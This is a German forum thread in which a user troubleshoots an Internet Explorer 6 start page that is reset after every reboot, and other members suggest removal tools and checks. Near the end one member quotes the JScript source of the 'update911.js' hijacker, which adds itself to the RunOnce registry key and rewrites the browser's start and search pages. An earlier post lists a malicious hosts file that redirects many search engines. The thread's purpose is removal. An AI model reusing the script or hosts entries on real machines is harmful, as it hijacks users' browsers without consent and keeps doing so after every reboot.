Hi!
Hab seit gestern ein kleines Problemchen das ich nicht in den Griff bekomme... und zwar habe ich seit gestern immer nach einem Neustart meines PCs die Seite http://81.211.105.9/index.php?v=1 als Startseite meines IE6.
Wenn ich das dann ändere mit Extras->Internetoptionen->Startseite, funktionierts wieder, aber eben nur bis zu einem Neustart des PCs, dann ist wieder diese sch*** Seite die Startseite.
Hab mich auch schon in der Registry auf die Suche gemacht... da findet sich besagte page als Wert im key
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
und im key
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page
Dortiges Ändern bewirkt das selbe wie wenn ichs im IE selbst änder: Zuerst klappts, nach Neustart nimma.
Hab meinen PC auch schon mit Ad-aware durchsucht; das findet außer 3 Cookies von der orf.at Seite auch nix.
Habts ihr Ideen? Hat das schon mal jemand erlebt?
thx, cu, Sensei
Startseite von IE wird geändert..!!!
-
-
Zitat von Sensei
Hab meinen PC auch schon mit Ad-aware durchsucht; das findet außer 3 Cookies von der orf.at Seite auch nix.
hast schon mal gschaut, was alles automatisch gestartet wird?
(ausführen -> msconfig -> autostart)
vielleicht solltest dort mal alles verdächtige rausschmeissen, kann ja sein, dass ad-aware den übeltäter nicht findet... -
hab ich auch schon gemacht... da is nur mehr mein virenscanner und ms office.
danke für die schnelle antwort trotzdem... sonst noch tipps? -
ausserdem könntest in der registry mal nach dem URL suchen, vielleicht gibts da nen eintrag, den du bis jetzt nicht gefunden hast...
-
hmmm...das hab ich ja schon gemacht (siehe mein erstes post).... und mit dem bearbeiten->suchen ding gehts irgendwie net... da hab ich jetzt auch danach gesucht und er hat mir gar keineergebnisse angezeigt (obwohl ich unter oben genanntem schlüssel genau den wert nachdem ich gesucht habe ja händisch gefunden habe)... ärgerlich sit das...!
danke für deine bemühungen; wenn wer noch ideen hat: nur her damit! -
-
check mal deine hosts datei hatte das gleiche Problem, dort wurden alle Suchmaschinen (naja, so etwa 25 davon) auf etwa so eine Seite weitergeleitet
war sowas wie trojan.qhostsGreets X :coolsmile
-
http://www.sysinternals.com/ntw2k/freeware/autoruns.shtml
downloaden und der Rest ergibt sich dann mit etwas Glück :-))
mfg Zentor -
so was ähnliches hab ich auch mal gehabt - einmal aus Bequemlichkeit mit dem Iexplorer gesurft und schon passiert...
Da wurde bei jedem Programmstart über eine "load.bat" im Windows-Verzeichnis wieder die Registry geändert. Den Aufruf dieser .bat hab ich nie gefunden, aber wenigstens den Inhalt eliminiert. -
das sind meistens sogenannte plugins.. leider nicht so leicht zu finden... die häufigste variante: in der registry gibt es einen eintrag 'ie plugins'. die beste methode ist, in der registry nach der geänderten adresse der startseite zu suchen.
lg michi -
Scan mal mit Spybot http://www.safer-networking.org/
Macht das gleiche wie Ad-aware, hat aber eine umfassendere Datenbank.
-
Hi!
Danke mal für eure zahlreichen Antworten. Gefunden hab ich den Übelktäter immer noch nicht.
Ich habe folgendes gemacht:
- Startseite händisch geändert
- Lavasoft Ad-aware drüberlaufen lassen, alles verdächtige gelöscht
- Spybot drüberlaufen lassen, alles verdächtige gelöscht
- mit msconfig alle verdächtigen Einträge deaktiviert (bei Systemstart)
- besagte Seite http://81.211.105.9/index.php?v=1 in der Registry gesucht; dort unter 2 keys gefunden (siehe erstes Post), diese händisch geändert --> beim nächsten systemstart waren sie wieder überschrieben.
- die hosts.2 Datei aus C:\WINDOWS\system32 angesehen; da sind zwar ein paar Einträge, von besagter Seite steht dort aber nix
- nach einer load.bat hab ich auch gesucht - nix gefunden.
Was noch offen wäre, ist die Sac he mit den PlugIns bzw. wenn ihr noch andere Ideen hättet. Wie soll ich das mit den Plugins machen...?! Ich find da irgendwie nix gscheits...!
Danke euch, Sensei -
schau ob du eine hostsfile in c:\windows\help hast, hatte ich nämlich, in der standen dann solche dinge wie
88.88.88.88 elite
207.44.220.30 http://www.google.akadns.net
207.44.220.30 http://www.google.com
207.44.220.30 google.com
207.44.220.30 http://www.altavista.com
207.44.220.30 altavista.com
207.44.220.30 search.yahoo.com
207.44.220.30 uk.search.yahoo.com
207.44.220.30 ca.search.yahoo.com
207.44.220.30 jp.search.yahoo.com
207.44.220.30 au.search.yahoo.com
207.44.220.30 de.search.yahoo.com
207.44.220.30 search.yahoo.co.jp
207.44.220.30 http://www.lycos.de
207.44.220.30 http://www.lycos.ca
207.44.220.30 http://www.lycos.jp
207.44.220.30 http://www.lycos.co.jp
207.44.220.30 alltheweb.com
207.44.220.30 web.ask.com
207.44.220.30 ask.com
207.44.220.30 http://www.ask.com
207.44.220.30 http://www.teoma.com
207.44.220.30 search.aol.com
207.44.220.30 http://www.looksmart.com
207.44.220.30 auto.search.msn.com
207.44.220.30 search.msn.com
207.44.220.30 ca.search.msn.com
207.44.220.30 fr.ca.search.msn.com
207.44.220.30 search.fr.msn.be
207.44.220.30 search.fr.msn.ch
207.44.220.30 search.latam.yupimsn.com
207.44.220.30 search.msn.at
207.44.220.30 search.msn.be
207.44.220.30 search.msn.ch
207.44.220.30 search.msn.co.in
207.44.220.30 search.msn.co.jp
207.44.220.30 search.msn.co.kr
207.44.220.30 search.msn.com.br
207.44.220.30 search.msn.com.hk
207.44.220.30 search.msn.com.my
207.44.220.30 search.msn.com.sg
207.44.220.30 search.msn.com.tw
207.44.220.30 search.msn.co.za
207.44.220.30 search.msn.de
207.44.220.30 search.msn.dk
207.44.220.30 search.msn.es
207.44.220.30 search.msn.fi
207.44.220.30 search.msn.fr
207.44.220.30 search.msn.it
207.44.220.30 search.msn.nl
207.44.220.30 search.msn.no
207.44.220.30 search.msn.se
207.44.220.30 search.ninemsn.com.au
207.44.220.30 search.t1msn.com.mx
207.44.220.30 search.xtramsn.co.nz
207.44.220.30 search.yupimsn.com
207.44.220.30 uk.search.msn.com
207.44.220.30 search.lycos.com
207.44.220.30 http://www.lycos.com
207.44.220.30 http://www.google.ca
207.44.220.30 google.ca
207.44.220.30 http://www.google.uk
207.44.220.30 http://www.google.co.uk
207.44.220.30 http://www.google.com.au
207.44.220.30 http://www.google.co.jp
207.44.220.30 http://www.google.jp
207.44.220.30 http://www.google.at
207.44.220.30 http://www.google.be
207.44.220.30 http://www.google.ch
207.44.220.30 http://www.google.de
207.44.220.30 http://www.google.se
207.44.220.30 http://www.google.dk
207.44.220.30 http://www.google.fi
207.44.220.30 http://www.google.fr
207.44.220.30 http://www.google.com.gr
207.44.220.30 http://www.google.com.hk
207.44.220.30 http://www.google.ie
207.44.220.30 http://www.google.co.il
207.44.220.30 http://www.google.it
207.44.220.30 http://www.google.co.kr
207.44.220.30 http://www.google.com.mx
207.44.220.30 http://www.google.nl
207.44.220.30 http://www.google.co.nz
207.44.220.30 http://www.google.pl
207.44.220.30 http://www.google.pt
207.44.220.30 http://www.google.com.ru
207.44.220.30 http://www.google.com.sg
207.44.220.30 http://www.google.co.th
207.44.220.30 http://www.google.com.tr
207.44.220.30 http://www.google.com.tw
207.44.220.30 go.google.com
207.44.220.30 google.at
207.44.220.30 google.be
207.44.220.30 google.de
207.44.220.30 google.dk
207.44.220.30 google.fi
207.44.220.30 google.fr
207.44.220.30 google.com.hk
207.44.220.30 google.ie
207.44.220.30 google.co.il
207.44.220.30 google.it
207.44.220.30 google.co.kr
207.44.220.30 google.com.mx
207.44.220.30 google.nl
207.44.220.30 google.co.nz
207.44.220.30 google.pl
207.44.220.30 google.com.ru
207.44.220.30 google.com.sg
207.44.220.30 http://www.hotbot.com
207.44.220.30 hotbot.comund in der Registry wurde die offizielle Adresse der Hosts datei dorthingeleitet
Greets X :coolsmile
-
also eine Datei hosts.* hab ich da nicht... nur einen Haufen Hilfedateien mit Endungen wie .chm, .hlp, .cnt usw! Aber eben nix auch nur annähernd mit hosts.* .... und dann noch folgende 4 .dll dateien:
C:\WINDOWS\Help\bnts.dll
C:\WINDOWS\Help\sniffpol.dll
C:\WINDOWS\Help\sstub.dll
C:\WINDOWS\Help\tshoot.dllHabts ihr die auch?
Sonst noch Anregungen um mein Prob. zu lösen (bitte nicht mit "PC neu aufsetzen" oder so... ;))
thx! -
probier mal ad-aware... vielleicht hast damit mehr glück als mit spybot.
-
ad-aware hab ich schon probiert (siehe meine posts weiter oben).
ABER:
BIN SOEBEN FÜNDIG GEWORDEN IM pc-praxis.de Forum für WinXP:
ZitatHab die IP schon wieder vergessen, aber
wenn 'Super Search' die Startseite ist,
dann sucht mal nach der Datei
update911.js
die ist im windows ordner oder im windoes/system32 ordner (weiss nicht
mehr genau).
die Datei kann man mit dem Editor öffnen.
an erster stelle steht die IP
und weiter unten die Registry-einträge.
Diese müßt ihr dann noch mit regedit
ändern z.B. in http://www.google.de
und fertig ist die Laube.
Das hat GEKLAPPT, also falls mal einer von euch so ein Prob hat...!
DANKE AUF JEDEN FALL AN ALLE FÜR EURE GROßARTIGE UNTERSTÜTZUNG!!!
CU, SENSEI -
Zitat von Sensei
ad-aware hab ich schon probiert (siehe meine posts weiter oben).
ABER:
BIN SOEBEN FÜNDIG GEWORDEN IM pc-praxis.de Forum für WinXP:
Das hat GEKLAPPT, also falls mal einer von euch so ein Prob hat...!
DANKE AUF JEDEN FALL AN ALLE FÜR EURE GROßARTIGE UNTERSTÜTZUNG!!!
CU, SENSEI
gratuliere
hat jemand eine fachliche erklärung dafür??
lg michi -
Nunja, fachliche Erklärung .. gleich das erste Ergebnis bei der Suche nach update911.js in Google fördert im Chip Online Forum folgendes zu Tage:
var url = "http://81.211.105.8/index.php?v=1";
var burl = "http://81.211.105.8/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");Der Eintrag war mit hoher Wahrscheinlichkeit die ganze Zeit im RunOnce Schlüssel und wurde von sensei einfach übersehen. :shinner:
-
Tja und wohl auch mein Posting von oben. autoruns listet alles auf was bei XP so autostarten kann, auch die IE-Plugins...
Und ein update911.js im RunOnce is ja echt kein großartig verschleierter autostart
mfg Zentor -
sorry hätte wohl mal selber googeln sollen :shinner:
man kann über das autorun direkt javascripts starten? oder geht das eh über den ie?
Zentor: msconfig machts eigentlich auch im großen und ganzen.. wenn man zb xp hat. hab bis jetzt noch nie was gesehen was automatisch gestartet ist und nicht dort drinstand.. obwohls ja da glaube ich noch zwei oder drei hintertürchen gibt...
lg michi -
Jetzt mitmachen!
Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!